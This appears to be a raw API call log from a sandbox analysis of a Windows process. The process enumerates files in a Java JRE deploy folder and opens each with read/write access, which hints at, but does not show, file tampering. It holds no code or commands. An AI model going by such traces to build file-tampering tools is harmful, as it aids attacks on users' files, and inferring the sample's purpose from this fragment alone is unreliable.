[0095.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0095.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0095.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6ebe0, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 64 [0095.277] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.277] GetFileType (hFile=0x368) returned 0x1 [0095.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0095.277] CloseHandle (hObject=0x368) returned 1 [0095.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0095.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0095.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0095.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0095.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0095.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0095.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0095.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0095.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0095.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0095.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0095.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0095.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0095.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0095.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0095.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0095.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0095.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0095.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0095.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0095.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0095.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0095.278] AreFileApisANSI () returned 1 [0095.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0095.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0095.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif") returned 64 [0095.278] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1e7d)) returned 1 [0095.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0095.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0095.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0095.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0095.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.278] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2fda, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="splash_11@2x-lic.gif", cAlternateFileName="SPLASH~3.GIF")) returned 1 [0095.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0095.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0095.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0095.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0095.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0095.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0095.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0095.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0095.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0095.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0095.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0095.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0095.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0095.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0095.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0095.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0095.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0095.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0095.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0095.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0095.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0095.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0095.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0095.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0095.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0095.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0095.279] AreFileApisANSI () returned 1 [0095.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif", lpUsedDefaultChar=0x0) returned 67 [0095.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0095.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0095.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0095.280] AreFileApisANSI () returned 1 [0095.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0095.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x823b8 [0095.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x823b8, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 67 [0095.280] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.280] GetFileType (hFile=0x368) returned 0x1 [0095.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x823b8 | out: hHeap=0x20000) returned 1 [0095.280] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0095.280] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0095.281] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0095.281] CloseHandle (hObject=0x368) returned 1 [0095.281] AreFileApisANSI () returned 1 [0095.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0095.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82c28 [0095.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x82c28, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 67 [0095.281] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.281] GetFileType (hFile=0x368) returned 0x1 [0095.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82c28 | out: hHeap=0x20000) returned 1 [0095.281] CloseHandle (hObject=0x368) returned 1 [0095.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0095.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0095.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0095.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0095.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0095.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0095.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0095.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0095.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0095.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0095.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0095.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0095.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0095.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0095.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0095.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0095.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0095.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0095.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0095.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0095.282] AreFileApisANSI () returned 1 [0095.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0095.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82838 [0095.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x82838, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 67 [0095.283] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2fda)) returned 1 [0095.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82838 | out: hHeap=0x20000) returned 1 [0095.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0095.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0095.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0095.283] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.283] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.283] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x84, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8a9f8, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x84, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="\\d", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⿚")) returned 0 [0095.283] FindClose (in: hFindFile=0x78750 | out: hFindFile=0x78750) returned 1 [0095.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0095.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0095.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0095.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0095.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0095.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68fe0 | out: hHeap=0x20000) returned 1 [0095.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0095.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0095.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0095.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0095.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0095.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0095.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0095.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0095.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0095.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0095.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0095.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0095.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0095.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0095.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0095.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0095.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0095.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0095.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.284] AreFileApisANSI () returned 1 [0095.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar", lpUsedDefaultChar=0x0) returned 50 [0095.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0095.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.284] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0095.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0095.284] AreFileApisANSI () returned 1 [0095.284] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0095.284] 